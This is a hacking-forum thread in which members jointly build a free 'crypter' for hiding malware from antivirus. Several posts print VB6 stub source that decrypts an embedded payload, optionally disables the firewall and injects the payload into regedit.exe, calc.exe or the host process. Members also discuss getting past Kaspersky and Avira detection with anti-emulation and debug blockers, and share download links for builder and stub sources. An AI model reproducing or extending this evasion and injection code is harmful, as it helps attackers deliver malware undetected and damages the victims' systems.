XR3X
Clicky

Jump to content


Photo

The Matrix Project

Source

  • This topic is locked This topic is locked
43 replies to this topic

#1 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 25 December 2012 - 02:22 AM

Seeking some ppl that may wanna help me to build a crypter.

The special thing is builder will be written in vb6 (by me), and stubs should be written in c, or c++, delphi, asm.

 

The idea is to build an open source crypter for everyone 100 % free of charge. A peace of quality 

cause it uses high level language for stub.

 

Something like Broad Crypter just 4 free.

 

So if u are think i have to be part of this write in this topic what u could do / code.

 

Will be a lot of fun i guess ;D


  • mirza.sahaib, akitta, PId and 1 other like this

#2 cob_258

cob_258

    Member

  • Associate
  • Reputation: 91
    Good
  • 59 posts
  • Location@DZ

Posted 25 December 2012 - 09:49 AM

I can help with asm stub


  • Neelix likes this

#3 Simon-Benyo

Simon-Benyo

    Intermediate Member

  • Associate
  • Reputation: 136
    Very Good
  • 145 posts
  • LocationSyria - Aleppo
Contributor

Posted 25 December 2012 - 01:07 PM

i can provide some c++ - asm support :)



#4 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 25 December 2012 - 02:54 PM

frjiezpf.jpg

 

Infos : Builder / Stub Source written in Vb6

 

- Iconchanger

- Cloner

- Eof

- Firewall

 

4 custom injections

 

Crypter uses RES in Builder and Loadressourcedata in stub

 

Encryption is a modded rc4

 

 

main module stub

 

 

Option Explicit

Sub Main()
 
Dim RootByte() As Byte, RootOptions As String
 
RootByte = LoadResData(45, 15) ' File
RootOptions = StrConv(LoadResData(80, 60), vbUnicode) ' Options
 
Call RootDecrypt(RootByte, "KörperVolumen") ' Cryptkey
 
If Mid$(RootOptions, 1, 1) = 1 Then Call sDisableWall
If Mid$(RootOptions, 2, 1) = 1 Then Call RootPE(GetFilePath, RootByte)                              ' thixexe
If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\regedit.exe", RootByte)       ' regedit
If Mid$(RootOptions, 4, 1) = 1 Then Call RootPE(Environ("windir") & "\Updreg.exe", RootByte)        ' updreg
If Mid$(RootOptions, 5, 1) = 1 Then Call RootPE(Environ("windir") & "\system32" & "\calc.exe", RootByte) ' calc
 
End Sub
 
Function GetFilePath() As String
Dim Platz(512) As Byte
Call RootInvoke("kernel32", "GetModuleFileNameW", 0, VarPtr(Platz(0)), 512)
GetFilePath = Platz
End Function

 

 
Encryption

Public Sub RootDecrypt(ByRef ByteArray() As Byte, ByVal sKey As String)
  Const MagicByte As Byte = &HEE
  Dim PwdLen As Long
  Dim PwdAsc As Byte
  Dim i As Long
  Dim j As Long
  Dim LB As Long
  Dim UB As Long
  
    PwdLen = Len(sKey)
    LB = LBound(ByteArray)
    UB = UBound(ByteArray)
    
    For j = 1 To PwdLen
    
      PwdAsc = Asc(Mid$(sKey, j, 1)) Xor MagicByte
      For i = LB To UB Step PwdLen
        ByteArray(i) = ByteArray(i) Xor PwdAsc Xor (i And &HEE)
      Next i
      LB = LB + 1
    
    Next j
 
End Sub
 
Full Source attached well documenmted, if there are any questions open pls ask.
 

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  18.83KB   180 downloads

  • x58, delphifocus and Rottweiler like this

#5 cob_258

cob_258

    Member

  • Associate
  • Reputation: 91
    Good
  • 59 posts
  • Location@DZ

Posted 25 December 2012 - 04:56 PM

Call RootDecrypt(RootByte, "KörperVolumen") ' Cryptkey

A unique key for each crypt would be better, don't you think?



#6 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 25 December 2012 - 05:34 PM

I could implement that easily will upload new one 



#7 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 25 December 2012 - 06:04 PM

Option Explicit
Sub Main()
 
Dim RootByte() As Byte, RootOptions As String, RootKey As String
 
RootByte = LoadResData(45, 15)
RootOptions = StrConv(LoadResData(80, 60), vbUnicode)
RootKey = StrConv(LoadResData(120, 100), vbUnicode)
 
Call RootDecrypt(RootByte, RootKey) ' Cryptkey
 
If Mid$(RootOptions, 1, 1) = 1 Then Call sDisableWall
If Mid$(RootOptions, 2, 1) = 1 Then Call RootPE(GetFilePath, RootByte)                              ' thixexe
If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\regedit.exe", RootByte)       ' regedit
If Mid$(RootOptions, 4, 1) = 1 Then Call RootPE(Environ("windir") & "\Updreg.exe", RootByte)        ' updreg
If Mid$(RootOptions, 5, 1) = 1 Then Call RootPE(Environ("windir") & "\system32" & "\calc.exe", RootByte) ' calc
 
End Sub
 
Function GetFilePath() As String
Dim Platz(512) As Byte
Call RootInvoke("kernel32", "GetModuleFileNameW", 0, VarPtr(Platz(0)), 512)
GetFilePath = Platz
End Function

 

Now its done new builder and stub source attached

 

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  18.93KB   124 downloads


  • delphifocus likes this

#8 cob_258

cob_258

    Member

  • Associate
  • Reputation: 91
    Good
  • 59 posts
  • Location@DZ

Posted 26 December 2012 - 01:35 PM

This is my asm stub, regedit injection is detected by kaspersky heur (can be bypassed with anti emulator)

 

 

TODO :
- fix DisableWall (problem with RegOpenKeyW)
- Update to unique password

 

 

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  3.16KB   97 downloads


  • Neelix and Simon-Benyo like this

#9 cob_258

cob_258

    Member

  • Associate
  • Reputation: 91
    Good
  • 59 posts
  • Location@DZ

Posted 28 December 2012 - 01:28 PM

update

27.12.2012
+ updated to unique password (line commented to be compatible with the old builder)
+ added debug blocker, bypassed heur detection of KAV when injected in regedit

TODO :
- fix DisableWall

 

scans

Please Login or Register to see this Hidden Content


Please Login or Register to see this Hidden Content

 

 

 

avira detects crypted file because of resource section size, any idea of how to avoid that?


* bugs in builder :

- crash if failed to overwrite the crypted file
- when you press crypt then you cancel it writes the crypted file

 

Download

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  6.71KB   67 downloads



#10 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 29 December 2012 - 02:17 PM

Just figured it out other res method wont help you too but i can make an EOF Builder if you want currently working on Matrix may pm me ur msn ?



#11 cob_258

cob_258

    Member

  • Associate
  • Reputation: 91
    Good
  • 59 posts
  • Location@DZ

Posted 05 January 2013 - 10:48 AM

Asm stub updated (04.02.2013)

! DisableFireWall fixed by using 'netsh' (code from '

Please Login or Register to see this Hidden Content

')

 

Please Login or Register to see this Hidden Content

(10 / 34 )


ps: I will be absent for one or two weeks (because of my exams), feel free to modifiy the stub



#12 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 05 January 2013 - 12:41 PM

 u forget to upload ur fixed asm stub source m8, but iam on ur previous one reading some tuts about manual packing now and installed masm. hope there are some ppl that code a c++ and delphi stub too.



#13 DualCoder

DualCoder

    Member

  • Associate
  • Reputation: 39
    Fair
  • 34 posts
  • LocationSweden

Posted 07 January 2013 - 03:18 PM

Here is a C++ stub I wrote for this crypter.

 

It uses T4 Code Generation to encrypt some strings, so you will need to point the Pre-Build Event to "TextTransform.exe" or remove it completly.

I think the stub is quite stable but I haven't tested it verry well.

And there is no Firewall bypass in it yet.

 

Please Login or Register to see this Hidden Content

 

Source code is attached.

Attached Files


  • Neelix, ricota, x58 and 2 others like this

#14 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 07 January 2013 - 08:22 PM

Please Login or Register to see this Hidden Content

 Dualcoder great we have a c++ coder + rep


#15 roller

roller

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 3 posts

Posted 08 January 2013 - 06:17 AM

I need the compiled this files crypt.

Please man ;p



#16 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 08 January 2013 - 09:02 AM

learn how to compile them if you cant solve it by ur own (google) may go back to hf.

also this topic is for members that working on the project, not a topic that explains how to compile a crypter.

 

so if you want use it find out how.



#17 kevox2

kevox2

    Newbie

  • Members
  • Reputation: 1
    Neutral
  • 6 posts

Posted 10 January 2013 - 12:42 AM

good luck for u project! ;)



#18 0xM3N

0xM3N

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 2 posts

Posted 12 January 2013 - 01:43 PM

good work bro , thanks d: 



#19 cob_258

cob_258

    Member

  • Associate
  • Reputation: 91
    Good
  • 59 posts
  • Location@DZ

Posted 14 January 2013 - 01:57 PM

I forgot to upload the stub :P

Please Login or Register to see this Hidden Content

 

Please Login or Register to see this Hidden Content

  7.55KB   95 downloads


  • Ravage, x58, Cobra and 2 others like this

#20 true22

true22

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 1 posts

Posted 28 February 2013 - 01:42 PM

This is super awesome! gud job guys keep up this great job







Also tagged with one or more of these keywords: Source